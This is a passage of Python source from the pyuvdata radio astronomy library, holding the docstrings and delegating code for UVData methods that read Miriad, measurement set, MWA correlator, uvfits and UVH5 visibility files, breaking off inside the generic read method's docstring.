'phased' or None. 'drift' means the data are zenith drift data,
'phased' means the data are phased to a single RA/Dec. Default is None
meaning it will be guessed at based on the file contents.
correct_lat_lon : bool
Option to update the latitude and longitude from the known_telescopes
list if the altitude is missing.
background_lsts : bool
When set to True, the lst_array is calculated in a background thread.
run_check : bool
Option to check for the existence and proper shapes of parameters
after reading in the file (the default is True,
meaning the check will be run). Ignored if read_data is False.
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
Ignored if read_data is False.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reading in the file (the default is True, meaning the acceptable
range check will be done). Ignored if read_data is False.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
calc_lst : bool
Recalculate the LST values that are present within the file, useful in
cases where the "online" calculate values have precision or value errors.
Default is True.
fix_old_proj : bool
Applies a fix to uvw-coordinates and phasing, assuming that the old `phase`
method was used prior to writing the data, which had errors of the order of
one part in 1e4 - 1e5. See the phasing memo for more details. Default is
False.
fix_use_ant_pos : bool
If setting `fix_old_proj` to True, use the antenna positions to derive the
correct uvw-coordinates rather than using the baseline vectors. Default is
True.
Raises
------
IOError
If root file directory doesn't exist.
ValueError
If incompatible select keywords are set (e.g. `ant_str` with other
antenna selectors, `times` and `time_range`) or select keywords
exclude all data or if keywords are set to the wrong type.
If the data are multi source or have multiple
spectral windows.
If the metadata are not internally consistent.
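Examples
--------
A minimal usage sketch; the root directory name is a placeholder and the
baseline/polarization selection is purely illustrative::

    from pyuvdata import UVData

    uvd = UVData()
    uvd.read_miriad("example.uv", bls=[(0, 1), (1, 2)], polarizations=["xx"])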
"""
from . import miriad
if isinstance(filepath, (list, tuple, np.ndarray)):
raise ValueError(
"Reading multiple files from class specific "
"read functions is no longer supported. "
"Use the generic `uvdata.read` function instead."
)
miriad_obj = miriad.Miriad()
miriad_obj.read_miriad(
filepath,
correct_lat_lon=correct_lat_lon,
read_data=read_data,
phase_type=phase_type,
antenna_nums=antenna_nums,
ant_str=ant_str,
bls=bls,
polarizations=polarizations,
time_range=time_range,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
calc_lst=calc_lst,
fix_old_proj=fix_old_proj,
fix_use_ant_pos=fix_use_ant_pos,
)
self._convert_from_filetype(miriad_obj)
del miriad_obj
def read_ms(
self,
filepath,
axis=None,
data_column="DATA",
pol_order="AIPS",
background_lsts=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
ignore_single_chan=True,
raise_error=True,
read_weights=True,
):
"""
Read in data from a measurement set.
Parameters
----------
filepath : str
The measurement set root directory to read from.
axis : str
Axis to concatenate files along. This enables fast concatenation
along the specified axis without the normal checking that all other
metadata agrees. This method does not guarantee correct resulting
objects. Please see the docstring for fast_concat for details.
Allowed values are: 'blt', 'freq', 'polarization'. Only used if
multiple files are passed.
data_column : str
name of CASA data column to read into data_array. Options are:
'DATA', 'MODEL', or 'CORRECTED_DATA'
pol_order : str
Option to specify polarizations order convention, options are
'CASA' or 'AIPS'.
background_lsts : bool
When set to True, the lst_array is calculated in a background thread.
run_check : bool
Option to check for the existence and proper shapes of parameters
after reading in the file (the default is True,
meaning the check will be run).
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reading in the file (the default is True, meaning the acceptable
range check will be done).
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
ignore_single_chan : bool
Some measurement sets (e.g., those from ALMA) use single channel spectral
windows for recording pseudo-continuum channels or storing other metadata
in the track when the telescopes are not on source. Because of the way
the object is structured (where all spectral windows are assumed to be
simultaneously recorded), this can significantly inflate the size and memory
footprint of UVData objects. By default, single channel windows are ignored
to avoid this issue, although they can be included if setting this parameter
equal to True.
raise_error : bool
The measurement set format allows for different spectral windows and
polarizations to have different metadata for the same time-baseline
combination, but UVData objects do not. If detected, by default the reader
will throw an error. However, if set to False, the reader will simply give
a warning, and will use the first value read in the file as the "correct"
metadata in the UVData object.
read_weights : bool
Read in the weights from the MS file, default is True. If False, the method
will set the `nsample_array` to a uniform value of 1.0.
Raises
------
IOError
If root file directory doesn't exist.
ValueError
If the `data_column` is not set to an allowed value.
If the data have multiple subarrays or are multi source or have
multiple spectral windows.
If the data have multiple data description ID values.
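Examples
--------
A minimal usage sketch; the measurement set name is a placeholder. Here the
calibrated CORRECTED_DATA column is read instead of the default DATA column::

    from pyuvdata import UVData

    uvd = UVData()
    uvd.read_ms("example.ms", data_column="CORRECTED_DATA")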
"""
if isinstance(filepath, (list, tuple, np.ndarray)):
raise ValueError(
"Reading multiple files from class specific "
"read functions is no longer supported. "
"Use the generic `uvdata.read` function instead."
)
from . import ms
ms_obj = ms.MS()
ms_obj.read_ms(
filepath,
data_column=data_column,
pol_order=pol_order,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
ignore_single_chan=ignore_single_chan,
raise_error=raise_error,
read_weights=read_weights,
)
self._convert_from_filetype(ms_obj)
del ms_obj
def read_mwa_corr_fits(
self,
filelist,
axis=None,
use_aoflagger_flags=None,
use_cotter_flags=None,
remove_dig_gains=True,
remove_coarse_band=True,
correct_cable_len=False,
correct_van_vleck=False,
cheby_approx=True,
flag_small_auto_ants=True,
flag_small_sig_ants=None,
propagate_coarse_flags=True,
flag_init=True,
edge_width=80e3,
start_flag="goodtime",
end_flag=0.0,
flag_dc_offset=True,
remove_flagged_ants=True,
phase_to_pointing_center=False,
read_data=True,
data_array_dtype=np.complex64,
nsample_array_dtype=np.float32,
background_lsts=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
):
"""
Read in MWA correlator gpu box files.
The default settings remove some of the instrumental effects in the bandpass
by dividing out the digital gains and the coarse band shape.
If the desired output is raw correlator data, set remove_dig_gains=False,
remove_coarse_band=False, correct_cable_len=False, and
phase_to_pointing_center=False.
Parameters
----------
filelist : list of str
The list of MWA correlator files to read from. Must include at
least one fits file and only one metafits file per data set.
axis : str
Axis to concatenate files along. This enables fast concatenation
along the specified axis without the normal checking that all other
metadata agrees. This method does not guarantee correct resulting
objects. Please see the docstring for fast_concat for details.
Allowed values are: 'blt', 'freq', 'polarization'. Only used if
multiple files are passed.
use_aoflagger_flags : bool
Option to use aoflagger mwaf flag files. Defaults to True if aoflagger
flag files are submitted.
use_cotter_flags : bool
Being replaced by use_aoflagger_flags and will be removed in v2.4.
remove_dig_gains : bool
Option to divide out digital gains.
remove_coarse_band : bool
Option to divide out coarse band shape.
correct_cable_len : bool
Option to apply a cable delay correction.
correct_van_vleck : bool
Option to apply a Van Vleck correction.
cheby_approx : bool
Only used if correct_van_vleck is True. Option to implement the Van
Vleck correction with a Chebyshev polynomial approximation.
flag_small_auto_ants : bool
Only used if correct_van_vleck is True. Option to completely flag any
antenna for which the autocorrelation falls below a threshold found by
the Van Vleck correction to indicate bad data. Specifically, the
threshold used is 0.5 * integration_time * channel_width. If set to False,
only the times and frequencies at which the auto is below the
threshold will be flagged for the antenna.
flag_small_sig_ants : bool
Being replaced with flag_small_auto_ants and will be removed in v2.4.
propagate_coarse_flags : bool
Option to propagate flags for missing coarse channel integrations
across frequency.
flag_init: bool
Set to True in order to do routine flagging of coarse channel edges,
start or end integrations, or the center fine channel of each coarse
channel. See associated keywords.
edge_width: float
Only used if flag_init is True. Set to the width to flag on the edge
of each coarse channel, in Hz. Errors if not equal to an integer
multiple of channel_width. Set to 0 for no edge flagging.
start_flag: float or str
Only used if flag_init is True. The number of seconds to flag at the
beginning of the observation. Set to 0 for no flagging. Default is
'goodtime', which uses information in the metafits file to determine
the length of time that should be flagged. Errors if input is not a
float or 'goodtime'. Errors if float input is not equal to an
integer multiple of the integration time.
end_flag: float
Only used if flag_init is True. Set to the number of seconds to flag
at the end of the observation. Set to 0 for no flagging. Errors if
not an integer multiple of the integration time.
flag_dc_offset: bool
Only used if flag_init is True. Set to True to flag the center fine
channel of each coarse channel. Only used if file_type is
'mwa_corr_fits'.
remove_flagged_ants : bool
Option to perform a select to remove antennas flagged in the metafits
file. If correct_van_vleck and flag_small_auto_ants are both True then
antennas flagged by the Van Vleck correction are also removed.
phase_to_pointing_center : bool
Option to phase to the observation pointing center.
read_data : bool
Read in the visibility and flag data. If set to False, only the
basic header info and metadata are read in. Setting read_data to False
results in a metadata only object.
data_array_dtype : numpy dtype
Datatype to store the output data_array as. Must be either
np.complex64 (single-precision real and imaginary) or np.complex128
(double-precision real and imaginary).
nsample_array_dtype : numpy dtype
Datatype to store the output nsample_array as. Must be either
np.float64 (double-precision), np.float32 (single-precision), or
np.float16 (half-precision). Half-precision is only recommended for
cases where no sampling or averaging of baselines will occur,
because round-off errors can be quite large (~1e-3).
background_lsts : bool
When set to True, the lst_array is calculated in a background thread.
run_check : bool
Option to check for the existence and proper shapes of parameters
after reading in the file (the default is True,
meaning the check will be run).
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reading in the file (the default is True, meaning the acceptable
range check will be done).
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
Raises
------
ValueError
If required files are missing or multiple metafits files are
included in filelist.
If files from different observations are included in filelist.
If files in filelist have different fine channel widths.
If file types other than fits, metafits, and mwaf files are included
in filelist.
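Examples
--------
A minimal usage sketch; the file names are placeholders for a real MWA data
set (one metafits file plus one or more correlator fits files)::

    from pyuvdata import UVData

    mwa_files = [
        "obs.metafits",
        "obs_gpubox01_00.fits",
        "obs_gpubox02_00.fits",
    ]
    uvd = UVData()
    uvd.read_mwa_corr_fits(mwa_files, correct_cable_len=True)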
"""
from . import mwa_corr_fits
if isinstance(filelist[0], (list, tuple, np.ndarray)):
raise ValueError(
"Reading multiple files from class specific "
"read functions is no longer supported. "
"Use the generic `uvdata.read` function instead."
)
if use_cotter_flags is not None:
use_aoflagger_flags = use_cotter_flags
warnings.warn(
"Use `use_aoflagger_flags` instead of `use_cotter_flags`."
"`use_cotter_flags` is deprecated, and will be removed in "
"pyuvdata v2.4.",
DeprecationWarning,
)
if flag_small_sig_ants is not None:
flag_small_auto_ants = flag_small_sig_ants
warnings.warn(
"Use `flag_small_auto_ants` instead of `flag_small_sig_ants`."
"`flag_small_sig_ants` is deprecated, and will be removed in "
"pyuvdata v2.4.",
DeprecationWarning,
)
corr_obj = mwa_corr_fits.MWACorrFITS()
corr_obj.read_mwa_corr_fits(
filelist,
use_aoflagger_flags=use_aoflagger_flags,
remove_dig_gains=remove_dig_gains,
remove_coarse_band=remove_coarse_band,
correct_cable_len=correct_cable_len,
correct_van_vleck=correct_van_vleck,
cheby_approx=cheby_approx,
flag_small_auto_ants=flag_small_auto_ants,
propagate_coarse_flags=propagate_coarse_flags,
flag_init=flag_init,
edge_width=edge_width,
start_flag=start_flag,
end_flag=end_flag,
flag_dc_offset=flag_dc_offset,
remove_flagged_ants=remove_flagged_ants,
phase_to_pointing_center=phase_to_pointing_center,
read_data=read_data,
data_array_dtype=data_array_dtype,
nsample_array_dtype=nsample_array_dtype,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
self._convert_from_filetype(corr_obj)
del corr_obj
def read_uvfits(
self,
filename,
axis=None,
antenna_nums=None,
antenna_names=None,
ant_str=None,
bls=None,
frequencies=None,
freq_chans=None,
times=None,
time_range=None,
lsts=None,
lst_range=None,
polarizations=None,
blt_inds=None,
keep_all_metadata=True,
read_data=True,
background_lsts=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
fix_old_proj=None,
fix_use_ant_pos=True,
):
"""
Read in header, metadata and data from a single uvfits file.
Parameters
----------
filename : str
The uvfits file to read from.
axis : str
Axis to concatenate files along. This enables fast concatenation
along the specified axis without the normal checking that all other
metadata agrees. This method does not guarantee correct resulting
objects. Please see the docstring for fast_concat for details.
Allowed values are: 'blt', 'freq', 'polarization'. Only used if
multiple files are passed.
antenna_nums : array_like of int, optional
The antenna numbers to include when reading data into the object
(antenna positions and names for the removed antennas will be retained
unless `keep_all_metadata` is False). This cannot be provided if
`antenna_names` is also provided. Ignored if read_data is False.
antenna_names : array_like of str, optional
The antenna names to include when reading data into the object
(antenna positions and names for the removed antennas will be retained
unless `keep_all_metadata` is False). This cannot be provided if
`antenna_nums` is also provided. Ignored if read_data is False.
bls : list of tuple, optional
A list of antenna number tuples (e.g. [(0, 1), (3, 2)]) or a list of
baseline 3-tuples (e.g. [(0, 1, 'xx'), (2, 3, 'yy')]) specifying baselines
to include when reading data into the object. For length-2 tuples,
the ordering of the numbers within the tuple does not matter. For
length-3 tuples, the polarization string is in the order of the two
antennas. If length-3 tuples are provided, `polarizations` must be
None. Ignored if read_data is False.
ant_str : str, optional
A string containing information about what antenna numbers
and polarizations to include when reading data into the object.
Can be 'auto', 'cross', 'all', or combinations of antenna numbers
and polarizations (e.g. '1', '1_2', '1x_2y'). See tutorial for more
examples of valid strings and the behavior of different forms for ant_str.
If '1x_2y,2y_3y' is passed, both polarizations 'xy' and 'yy' will
be kept for both baselines (1, 2) and (2, 3) to return a valid
pyuvdata object.
An ant_str cannot be passed in addition to any of `antenna_nums`,
`antenna_names`, `bls` args or the `polarizations` parameters,
if it is, a ValueError will be raised. Ignored if read_data is False.
frequencies : array_like of float, optional
The frequencies to include when reading data into the object, each
value passed here should exist in the freq_array. Ignored if
read_data is False.
freq_chans : array_like of int, optional
The frequency channel numbers to include when reading data into the
object. Ignored if read_data is False.
times : array_like of float, optional
The times to include when reading data into the object, each value
passed here should exist in the time_array in the file.
Cannot be used with `time_range`.
time_range : array_like of float, optional
The time range in Julian Date to include when reading data into
the object, must be length 2. Some of the times in the file should
fall between the first and last elements.
Cannot be used with `times`.
lsts : array_like of float, optional
The local sidereal times (LSTs) to keep in the object, each value
passed here should exist in the lst_array. Cannot be used with
`times`, `time_range`, or `lst_range`.
lst_range : array_like of float, optional
The local sidereal time (LST) range in radians to keep in the
object, must be of length 2. Some of the LSTs in the object should
fall between the first and last elements. If the second value is
smaller than the first, the LSTs are treated as having phase-wrapped
around LST = 2*pi = 0, and the LSTs kept on the object will run from
the larger value, through 0, and end at the smaller value.
polarizations : array_like of int, optional
The polarization numbers to include when reading data into the
object, each value passed here should exist in the polarization_array.
Ignored if read_data is False.
blt_inds : array_like of int, optional
The baseline-time indices to include when reading data into the
object. This is not commonly used. Ignored if read_data is False.
keep_all_metadata : bool
Option to keep all the metadata associated with antennas, even those
that do not have data associated with them after the select option.
read_data : bool
Read in the visibility and flag data. If set to False, only the
basic header info and metadata are read in. Setting read_data to False
results in a metadata only object.
background_lsts : bool
When set to True, the lst_array is calculated in a background thread.
run_check : bool
Option to check for the existence and proper shapes of parameters
after reading in the file (the default is True,
meaning the check will be run). Ignored if read_data is False.
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
Ignored if read_data is False.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reading in the file (the default is True, meaning the acceptable
range check will be done). Ignored if read_data is False.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
fix_old_proj : bool
Applies a fix to uvw-coordinates and phasing, assuming that the old `phase`
method was used prior to writing the data, which had errors of the order of
one part in 1e4 - 1e5. See the phasing memo for more details. Default is
False.
fix_use_ant_pos : bool
If setting `fix_old_proj` to True, use the antenna positions to derive the
correct uvw-coordinates rather than using the baseline vectors. Default is
True.
Raises
------
IOError
If filename doesn't exist.
ValueError
If incompatible select keywords are set (e.g. `ant_str` with other
antenna selectors, `times` and `time_range`) or select keywords
exclude all data or if keywords are set to the wrong type.
If the data are multi source or have multiple
spectral windows.
If the metadata are not internally consistent or missing.
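Examples
--------
A minimal usage sketch; the file name is a placeholder. The first call reads
only the metadata, the second reads the data for a subset of channels::

    import numpy as np
    from pyuvdata import UVData

    uvd_meta = UVData()
    uvd_meta.read_uvfits("example.uvfits", read_data=False)

    uvd = UVData()
    uvd.read_uvfits("example.uvfits", freq_chans=np.arange(64))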
"""
from . import uvfits
if isinstance(filename, (list, tuple, np.ndarray)):
raise ValueError(
"Reading multiple files from class specific "
"read functions is no longer supported. "
"Use the generic `uvdata.read` function instead."
)
uvfits_obj = uvfits.UVFITS()
uvfits_obj.read_uvfits(
filename,
antenna_nums=antenna_nums,
antenna_names=antenna_names,
ant_str=ant_str,
bls=bls,
frequencies=frequencies,
freq_chans=freq_chans,
times=times,
time_range=time_range,
lsts=lsts,
lst_range=lst_range,
polarizations=polarizations,
blt_inds=blt_inds,
keep_all_metadata=keep_all_metadata,
read_data=read_data,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
fix_old_proj=fix_old_proj,
fix_use_ant_pos=fix_use_ant_pos,
)
self._convert_from_filetype(uvfits_obj)
del uvfits_obj
def read_uvh5(
self,
filename,
axis=None,
antenna_nums=None,
antenna_names=None,
ant_str=None,
bls=None,
frequencies=None,
freq_chans=None,
times=None,
time_range=None,
lsts=None,
lst_range=None,
polarizations=None,
blt_inds=None,
keep_all_metadata=True,
read_data=True,
data_array_dtype=np.complex128,
multidim_index=False,
background_lsts=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
fix_old_proj=None,
fix_use_ant_pos=True,
):
"""
Read a UVH5 file.
Parameters
----------
filename : str
The UVH5 file to read from.
axis : str
Axis to concatenate files along. This enables fast concatenation
along the specified axis without the normal checking that all other
metadata agrees. This method does not guarantee correct resulting
objects. Please see the docstring for fast_concat for details.
Allowed values are: 'blt', 'freq', 'polarization'. Only used if
multiple files are passed.
antenna_nums : array_like of int, optional
The antenna numbers to include when reading data into the object
(antenna positions and names for the removed antennas will be retained
unless `keep_all_metadata` is False). This cannot be provided if
`antenna_names` is also provided. Ignored if read_data is False.
antenna_names : array_like of str, optional
The antenna names to include when reading data into the object
(antenna positions and names for the removed antennas will be retained
unless `keep_all_metadata` is False). This cannot be provided if
`antenna_nums` is also provided. Ignored if read_data is False.
bls : list of tuple, optional
A list of antenna number tuples (e.g. [(0, 1), (3, 2)]) or a list of
baseline 3-tuples (e.g. [(0, 1, 'xx'), (2, 3, 'yy')]) specifying baselines
to include when reading data into the object. For length-2 tuples,
the ordering of the numbers within the tuple does not matter. For
length-3 tuples, the polarization string is in the order of the two
antennas. If length-3 tuples are provided, `polarizations` must be
None. Ignored if read_data is False.
ant_str : str, optional
A string containing information about what antenna numbers
and polarizations to include when reading data into the object.
Can be 'auto', 'cross', 'all', or combinations of antenna numbers
and polarizations (e.g. '1', '1_2', '1x_2y'). See tutorial for more
examples of valid strings and the behavior of different forms for ant_str.
If '1x_2y,2y_3y' is passed, both polarizations 'xy' and 'yy' will
be kept for both baselines (1, 2) and (2, 3) to return a valid
pyuvdata object.
An ant_str cannot be passed in addition to any of `antenna_nums`,
`antenna_names`, `bls` args or the `polarizations` parameters,
if it is, a ValueError will be raised. Ignored if read_data is False.
frequencies : array_like of float, optional
The frequencies to include when reading data into the object, each
value passed here should exist in the freq_array. Ignored if
read_data is False.
freq_chans : array_like of int, optional
The frequency channel numbers to include when reading data into the
object. Ignored if read_data is False.
times : array_like of float, optional
The times to include when reading data into the object, each value
passed here should exist in the time_array in the file.
Cannot be used with `time_range`.
time_range : array_like of float, optional
The time range in Julian Date to include when reading data into
the object, must be length 2. Some of the times in the file should
fall between the first and last elements.
Cannot be used with `times`.
lsts : array_like of float, optional
The local sidereal times (LSTs) to keep in the object, each value
passed here should exist in the lst_array. Cannot be used with
`times`, `time_range`, or `lst_range`.
lst_range : array_like of float, optional
The local sidereal time (LST) range in radians to keep in the
object, must be of length 2. Some of the LSTs in the object should
fall between the first and last elements. If the second value is
smaller than the first, the LSTs are treated as having phase-wrapped
around LST = 2*pi = 0, and the LSTs kept on the object will run from
the larger value, through 0, and end at the smaller value.
polarizations : array_like of int, optional
The polarization numbers to include when reading data into the
object, each value passed here should exist in the polarization_array.
Ignored if read_data is False.
blt_inds : array_like of int, optional
The baseline-time indices to include when reading data into the
object. This is not commonly used. Ignored if read_data is False.
keep_all_metadata : bool
Option to keep all the metadata associated with antennas, even those
that do not have data associated with them after the select option.
read_data : bool
Read in the visibility and flag data. If set to False, only the
basic header info and metadata will be read in. Setting read_data to
False results in an incompletely defined object (check will not pass).
data_array_dtype : numpy dtype
Datatype to store the output data_array as. Must be either
np.complex64 (single-precision real and imaginary) or np.complex128 (double-
precision real and imaginary). Only used if the datatype of the visibility
data on-disk is not 'c8' or 'c16'.
multidim_index : bool
[Only for HDF5] If True, attempt to index the HDF5 dataset
simultaneously along all data axes. Otherwise index one axis at-a-time.
This only works if data selection is sliceable along all but one axis.
If indices are not well-matched to data chunks, this can be slow.
background_lsts : bool
When set to True, the lst_array is calculated in a background thread.
run_check : bool
Option to check for the existence and proper shapes of parameters
after reading in the file (the default is True,
meaning the check will be run). Ignored if read_data is False.
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
Ignored if read_data is False.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
reading in the file (the default is True, meaning the acceptable
range check will be done). Ignored if read_data is False.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
fix_old_proj : bool
Applies a fix to uvw-coordinates and phasing, assuming that the old `phase`
method was used prior to writing the data, which had errors of the order of
one part in 1e4 - 1e5. See the phasing memo for more details. Default is
to apply the correction if the attributes `phase_center_app_ra` and
`phase_center_app_dec` are missing (as they were introduced alongside the
new phasing method).
fix_use_ant_pos : bool
If setting `fix_old_proj` to True, use the antenna positions to derive the
correct uvw-coordinates rather than using the baseline vectors. Default is
True.
Raises
------
IOError
If filename doesn't exist.
ValueError
If the data_array_dtype is not a complex dtype.
If incompatible select keywords are set (e.g. `ant_str` with other
antenna selectors, `times` and `time_range`) or select keywords
exclude all data or if keywords are set to the wrong type.
"""
from . import uvh5
if isinstance(filename, (list, tuple, np.ndarray)):
raise ValueError(
"Reading multiple files from class specific "
"read functions is no longer supported. "
"Use the generic `uvdata.read` function instead."
)
uvh5_obj = uvh5.UVH5()
uvh5_obj.read_uvh5(
filename,
antenna_nums=antenna_nums,
antenna_names=antenna_names,
ant_str=ant_str,
bls=bls,
frequencies=frequencies,
freq_chans=freq_chans,
times=times,
time_range=time_range,
lsts=lsts,
lst_range=lst_range,
polarizations=polarizations,
blt_inds=blt_inds,
data_array_dtype=data_array_dtype,
keep_all_metadata=keep_all_metadata,
read_data=read_data,
multidim_index=multidim_index,
background_lsts=background_lsts,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
fix_old_proj=fix_old_proj,
fix_use_ant_pos=fix_use_ant_pos,
)
self._convert_from_filetype(uvh5_obj)
del uvh5_obj
def read(
self,
filename,
axis=None,
file_type=None,
allow_rephase=True,
phase_center_radec=None,
unphase_to_drift=False,
phase_frame="icrs",
phase_epoch=None,
orig_phase_frame=None,
phase_use_ant_pos=True,
antenna_nums=None,
antenna_names=None,
ant_str=None,
bls=None,
frequencies=None,
freq_chans=None,
times=None,
polarizations=None,
blt_inds=None,
time_range=None,
keep_all_metadata=True,
read_data=True,
phase_type=None,
correct_lat_lon=True,
use_model=False,
data_column="DATA",
pol_order="AIPS",
data_array_dtype=np.complex128,
nsample_array_dtype=np.float32,
use_aoflagger_flags=None,
use_cotter_flags=None,
remove_dig_gains=True,
remove_coarse_band=True,
correct_cable_len=False,
correct_van_vleck=False,
cheby_approx=True,
flag_small_auto_ants=True,
flag_small_sig_ants=None,
propagate_coarse_flags=True,
flag_init=True,
edge_width=80e3,
start_flag="goodtime",
end_flag=0.0,
flag_dc_offset=True,
remove_flagged_ants=True,
phase_to_pointing_center=False,
skip_bad_files=False,
multidim_index=False,
background_lsts=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
isource=None,
irec=None,
isb=None,
corrchunk=None,
pseudo_cont=False,
lsts=None,
lst_range=None,
calc_lst=True,
fix_old_proj=None,
fix_use_ant_pos=True,
make_multi_phase=False,
ignore_name=False,
):
"""
Read a generic file into a UVData object.
Parameters
----------
filename : str or array_like of str
The file(s) or list(s) (or array(s)) of files to read from.
file_type : str
One of ['uvfits', 'miriad', 'fhd', 'ms', 'uvh5'] or None.
If None, the code attempts to guess what the file type is.
For miriad and ms types, this is based on the standard directory
structure. For FHD, uvfits and uvh5 files it's based on file
extensions (FHD: .sav, .txt; uvfits: .uvfits; uvh5: .uvh5).
Note that if a list of datasets is passed, the file type is
determined from the first dataset.
axis : str
Axis to concatenate files along. This enables fast concatenation
along the specified axis without the normal checking that all other
metadata agrees. This method does not guarantee correct resulting
objects. Please see the docstring for fast_concat for details.
Allowed values are: 'blt', 'freq', 'polarization'. Only used if
multiple files are passed.
allow_rephase : bool
Allow rephasing of phased file data so that data from files with
different phasing can be combined.
phase_center_radec : array_like of float
The phase center to phase the files to before adding the objects in
radians (in the ICRS frame). If set to None and multiple files are
read with different phase centers, the phase center of the first
file will be used.
unphase_to_drift : bool
Unphase the data from the files before combining them.
phase_frame : str
The astropy frame to phase to. Either 'icrs' or 'gcrs'.
'gcrs' accounts for precession & nutation,
'icrs' accounts for precession, nutation & aberration.
Only used if `phase_center_radec` is set.
orig_phase_frame : str
The original phase frame of the data (if it is already phased). Used
for unphasing, only if `unphase_to_drift` or `phase_center_radec`
are set. Defaults to using the 'phase_center_frame' attribute or
'icrs' if that attribute is None.
phase_use_ant_pos : bool
If True, calculate the phased or unphased uvws directly from the
antenna positions rather than from the existing uvws.
Only used if `unphase_to_drift` or `phase_center_radec` are set.
antenna_nums : array_like of int, optional
The antenna numbers to include when reading data into the object
(antenna positions and names for the removed antennas will be retained
unless `keep_all_metadata` is False). This cannot be provided if
`antenna_names` is also provided.
antenna_names : array_like of str, optional
The antenna names to include when reading data into the object
(antenna positions and names for the removed antennas will be retained
unless `keep_all_metadata` is False). This cannot be provided if
`antenna_nums` is also provided.
bls : list of tuple, optional
A list of antenna number tuples (e.g. [(0, 1), (3, 2)]) or a list of
baseline 3-tuples (e.g. [(0, 1, 'xx'), (2, 3, 'yy')]) specifying baselines
to include when reading data into the object. For length-2 tuples,
the ordering of the numbers within the tuple does not matter. For
length-3 tuples, the polarization string is in the order of the two
antennas. If length-3 tuples are provided, `polarizations` must be
None.
ant_str : str, optional
A string containing information about what antenna numbers
and polarizations to include when reading data into the object.
Can be 'auto', 'cross', 'all', or combinations of antenna numbers
and polarizations (e.g. '1', '1_2', '1x_2y'). See tutorial for more
examples of valid strings and the behavior of different forms for ant_str.
If '1x_2y,2y_3y' is passed, both polarizations 'xy' and 'yy' will
be kept for both baselines (1, 2) and (2, 3) to return a valid
pyuvdata object.
An ant_str cannot be passed in addition to any of the `antenna_nums`,
`antenna_names`, `bls`, or `polarizations` parameters;
if it is, a ValueError will be raised.
frequencies : array_like of float, optional
The frequencies to include when reading data into the object, each
value passed here should exist in the freq_array.
freq_chans : array_like of int, optional
The frequency channel numbers to include when reading data into the
object. Ignored if read_data is False.
times : array_like of float, optional
The times to include when reading data into the object, each value
passed here should exist in the time_array in the file.
Cannot be used with `time_range`.
time_range : array_like of float, optional
The time range in Julian Date to include when reading data into
the object, must be length 2. Some of the times in the file should
fall between the first and last elements.
Cannot be used with `times`.
polarizations : array_like of int, optional
The polarization numbers to include when reading data into the
object, each value passed here should exist in the polarization_array.
blt_inds : array_like of int, optional
The baseline-time indices to include when reading data into the
object. This is not commonly used.
keep_all_metadata : bool
Option to keep all the metadata associated with antennas, even those
that do not have data associated with them after the select option.
read_data : bool
Read in the data. Only used if file_type is 'uvfits',
'miriad' or 'uvh5'. If set to False, only the metadata will be
read in. Setting read_data to False results in a metadata only
object.
phase_type : str, optional
Option to specify the phasing status of the data. Only used if
file_type is 'miriad'. Options are 'drift', 'phased' or None.
'drift' means the data are zenith drift data, 'phased' means the
data are phased to a single RA/Dec. Default is None
meaning it will be guessed at based on the file contents.
correct_lat_lon : bool
Option to update the latitude and longitude from the known_telescopes
list if the altitude is missing. Only used if file_type is 'miriad'.
use_model : bool
Option to read in the model visibilities rather than the dirty
visibilities (the default is False, meaning the dirty visibilities
will be read). Only used if file_type is 'fhd'.
data_column : str
Name of the CASA data column to read into data_array. Options are:
'DATA', 'MODEL', or 'CORRECTED_DATA'. Only used if file_type is 'ms'.
pol_order : str
Option to specify polarizations order convention, options are
'CASA' or 'AIPS'. Only used if file_type is 'ms'.
data_array_dtype : numpy dtype
Datatype to store the output data_array as. Must be either
np.complex64 (single-precision real and imaginary) or np.complex128 (double-
precision real and imaginary). Only used if the datatype of the visibility
data on-disk is not 'c8' or 'c16'. Only used if file_type is 'uvh5' or
'mwa_corr_fits'.
nsample_array_dtype : numpy dtype
Datatype to store the output nsample_array as. Must be either
np.float64 (double-precision), np.float32 (single-precision), or
np.float16 (half-precision). Half-precision is only recommended for
cases where no sampling or averaging of baselines will occur,
because round-off errors can be quite large (~1e-3). Only used if
file_type is 'mwa_corr_fits'.
use_aoflagger_flags : bool
Option to use aoflagger mwaf flag files. Defaults to True if aoflagger
flag files are submitted.
use_cotter_flags : bool
Being replaced by use_aoflagger_flags and will be removed in v2.4.
